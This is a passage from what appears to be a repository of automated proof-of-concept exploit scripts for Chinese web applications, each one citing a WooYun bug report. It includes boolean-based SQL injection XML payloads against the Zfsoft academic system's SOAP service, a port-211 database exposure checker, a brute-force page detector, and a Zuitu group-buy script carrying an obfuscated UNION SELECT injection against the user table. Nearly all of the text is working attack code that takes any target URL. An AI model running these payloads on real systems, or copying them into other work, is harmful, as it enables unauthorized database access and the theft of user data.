8 |
9 |
10 | jwc01'AnD'1'='2
11 | a
12 | a
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/pocs/zfsoft/xml/zfsoft_service_stryhm_sqli_true.xml:
--------------------------------------------------------------------------------
1 |
2 |
8 |
9 |
10 | jwc01'AnD'1'='1
11 | a
12 | a
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/pocs/zfsoft/zfsoft_database_control.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 正方教务系统数据库任意操纵
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-079938
6 | author: Lucifer
7 | description: 端口211数据可操纵,泄露敏感信息。
8 | '''
9 | import sys
10 | import socket
11 | import warnings
12 | from termcolor import cprint
13 | from urllib.parse import urlparse
14 |
15 | class zfsoft_database_control_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | port = 211
21 | if r"http" in self.url:
22 | #提取host
23 | host = urlparse(self.url)[1]
24 | try:
25 | port = int(host.split(':')[1])
26 | except:
27 | pass
28 | flag = host.find(":")
29 | if flag != -1:
30 | host = host[:flag]
31 | else:
32 | if self.url.find(":") >= 0:
33 | host = self.url.split(":")[0]
34 | port = int(self.url.split(":")[1])
35 | else:
36 | host = self.url
37 |
38 | try:
39 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
40 | s.settimeout(6)
41 | s.connect((host, port))
42 | cprint("[+]存在正方教务系统数据库任意操纵漏洞...(高危)\tpayload: "+host+":"+str(port), "red")
43 |
44 | except:
45 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
46 |
47 | if __name__ == "__main__":
48 | warnings.filterwarnings("ignore")
49 | testVuln = zfsoft_database_control_BaseVerify(sys.argv[1])
50 | testVuln.run()
51 |
--------------------------------------------------------------------------------
/pocs/zfsoft/zfsoft_default3_bruteforce.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 正方教务系统default3.aspx爆破页面
5 | referer: http://www.wooyun.org/bugs/WooYun-2013-21692
6 | author: Lucifer
7 | description: 文件default3.aspx页面可爆破。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class zfsoft_default3_bruteforce_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | try:
23 | req = requests.get(self.url, headers=headers, timeout=6, verify=False, allow_redirects=True)
24 | except:
25 | pass
26 | tmpurl = str(req.url)
27 | tmpurl = tmpurl.lower()
28 | if r"default2.aspx" in tmpurl or r"default.aspx" in tmpurl:
29 | vulnurl = tmpurl.replace("default2.aspx","").replace("default.aspx", "")
30 | else:
31 | vulnurl = tmpurl
32 | vulnurl = vulnurl + "default3.aspx"
33 | try:
34 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
35 | if r"__VIEWSTATEGENERATOR" in req.text and r"CheckCode.aspx" not in req.text and req.status_code ==200:
36 | cprint("[+]存在正方教务系统default3.aspx爆破页面...(敏感信息)\tpayload: "+vulnurl, "green")
37 | else:
38 | cprint("[-]不存在zfsoft_default3_bruteforce漏洞", "white", "on_grey")
39 |
40 | except:
41 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
42 |
43 | if __name__ == "__main__":
44 | warnings.filterwarnings("ignore")
45 | testVuln = zfsoft_default3_bruteforce_BaseVerify(sys.argv[1])
46 | testVuln.run()
47 |
--------------------------------------------------------------------------------
/pocs/zfsoft/zfsoft_service_stryhm_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 正方教务系统services.asmx SQL注入
5 | referer: http://www.wooyun.org/bugs/WooYun-2015-122523
6 | author: Lucifer
7 | description: webservice注入。
8 | '''
9 | import re
10 | import os
11 | import sys
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
16 | class zfsoft_service_stryhm_sqli_BaseVerify:
17 | def __init__(self, url):
18 | self.url = url
19 |
20 | def run(self):
21 | headers = {
22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
23 | "Content-Type":"text/xml; charset=utf-8",
24 | "SOAPAction":"http://www.zf_webservice.com/BMCheckPassword"
25 | }
26 | payload = "/service.asmx"
27 | true_path = os.getcwd() + "/pocs/zfsoft/xml/zfsoft_service_stryhm_sqli_true.xml"
28 | false_path = os.getcwd() + "/pocs/zfsoft/xml/zfsoft_service_stryhm_sqli_false.xml"
29 | with open(true_path, "r") as f:
30 | post_data_true = f.read()
31 | with open(false_path, "r") as f:
32 | post_data_false = f.read()
33 | pattern = re.compile('[0-9]')
34 | vulnurl = self.url + payload
35 | try:
36 | req1 = requests.post(vulnurl, data=post_data_true, headers=headers, timeout=10, verify=False)
37 | req2 = requests.post(vulnurl, data=post_data_false, headers=headers, timeout=10, verify=False)
38 | match1 = pattern.search(req1.text)
39 | match2 = pattern.search(req2.text)
40 | res_true = int(match1.group(0).replace('', '').replace('',''))
41 | res_false = int(match2.group(0).replace('', '').replace('',''))
42 | if res_true!=res_false:
43 | cprint("[+]存在正方教务系统services.asmx SQL注入漏洞...(高危)\tpayload: "+vulnurl+"..[需要对比查看xml文件内容]", "red")
44 | else:
45 | cprint("[-]不存在zfsoft_service_stryhm_sqli漏洞", "white", "on_grey")
46 |
47 | except:
48 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
49 |
50 | if __name__ == "__main__":
51 | warnings.filterwarnings("ignore")
52 | testVuln = zfsoft_service_stryhm_sqli_BaseVerify(sys.argv[1])
53 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/zuitu/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/zuitu/__init__.py
--------------------------------------------------------------------------------
/pocs/zuitu/zuitu_coupon_id_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 最土团购SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-075525
6 | author: Lucifer
7 | description: 基础函数过滤不全导致注射。ajax/coupon.php文件id参数存在注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class zuitu_coupon_id_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/ajax/coupon.php?action=consume&secret=8&id=2%27%29/**/AnD/**/1=2/**/UnIoN/**/SeLeCt/**/1,2,0,4,5,6,Md5(1234),8,9,10,11,9999999999,13,14,15,16/**/FrOm/**/user/**/WhErE/**/manager=0x59/**/LiMiT/**/0,1%23"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在最土团购SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在zuitu_coupon_id_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = zuitu_coupon_id_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------